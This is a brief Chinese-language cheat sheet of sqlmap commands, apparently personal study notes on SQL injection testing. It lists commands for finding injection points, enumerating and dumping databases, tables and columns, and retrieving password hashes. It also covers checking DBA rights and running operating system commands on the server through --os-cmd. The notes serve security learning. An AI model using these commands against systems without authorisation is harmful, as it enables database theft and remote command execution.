SQLMAP基本命令
python sqlmap.py -hh
判断是否存在注入点
python sqlmap.py -u 'URL'
python sqlmap.py -u "URL"
python sqlmap.py -u '[URL]' -forms
python sqlmap.py -u '[URL]' --method POST --data "[参数名=参数值]"
python sqlmap.py -r upload/1.txt

查询数据库 / 表名 / 数据
python sqlmap.py -u "[URL]" --dbs
python sqlmap.py -u "[URL]" --currentdb
python sqlmap.py -u "[URL]" -D XXX
python sqlmap.py -u "[URL]" -D [数据库] --tables
python sqlmap.py -u "[URL]" -D [数据库] -T XXX
python sqlmap.py -u "[URL]" -D [数据库] -T [表名] --columns
python sqlmap.py -u "[URL]" -D [数据库] -T [表名] -C [属性名] --dump
杂七杂八
python sqlmap.py --version
python sqlmap.py -u '[URL]' --passwords
python sqlmap.py -u '[URL]' --current-user
python sqlmap.py -u '[URL]' --level [1-5]
python sqlmap.py -u '[URL]' --risk=[0-3]
python sqlmap.py -u '[URL]' --is-dba
python sqlmap.py -u '[URL]' --os-cmd="[cmd命令]"
python sqlmap.py -u "[URL]" --referer "[URL]" -v [3-6]
总结
还有一些进阶操作需要进一步了解应用一下